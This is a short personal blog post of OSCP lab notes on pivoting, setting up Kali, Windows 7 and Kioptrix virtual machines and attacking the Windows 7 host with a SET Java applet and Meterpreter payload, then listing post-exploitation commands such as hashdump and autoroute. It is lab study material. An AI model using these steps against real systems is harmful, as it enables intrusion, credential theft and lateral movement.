OSCP Security Technology - Pivoting

OSCP Security Technology - Pivoting

Configure vmware - Virtual Network Editor

image-20211205205320381

image-20211205205410782

Set Kali, Windows 7 and Kioptrix virtual machines

Kali Linux - VMnet7 (Host-only)

image-20211205205840807

​ IP - 10.1.10.129

image-20211227110733790

Windows 7 - VMnet7 (Host-only) & NAT

image-20211205210306503

​ IP 1 - 10.1.10.128

​ IP 2 - 192.168.134.128

image-20211227111145475

Kioptrix - NAT

image-20211205210505295

​ IP - ????

Win 7 VM can talk with Kali and Kioptrix, but Kali can not talk with Kioptrix directly.

Set Java security -exception site list on Win 7.

image-20211227124537191

Start SE Toolkit on Kali.
sudo setoolkit
1 - Social-Engineering Attacks
2 - Website Attack Vectors
1 - Java Applet Attack Method
1 - Web Templates

image-20211227130123310

1 - Meterpreter Memory Injection (Default)

image-20211227130747275

SET Web Server is now listening ..

image-20211227130931442

Browser http://10.1.10.129 through Win 7.

image-20211227133231519

Failed to establish an active session this time.

If we succeed...

run autoroute -p

hashdump
ipconfig
arp -a 
netstat -ano
route
run autoroute -s 192.168.134.0/24
run autoroute -p 

image-20211227134135749

Exploit by MSF

image-20211227134558613

posted @ 2021-12-27 13:49  晨风_Eric  阅读(64)  评论(0编辑  收藏  举报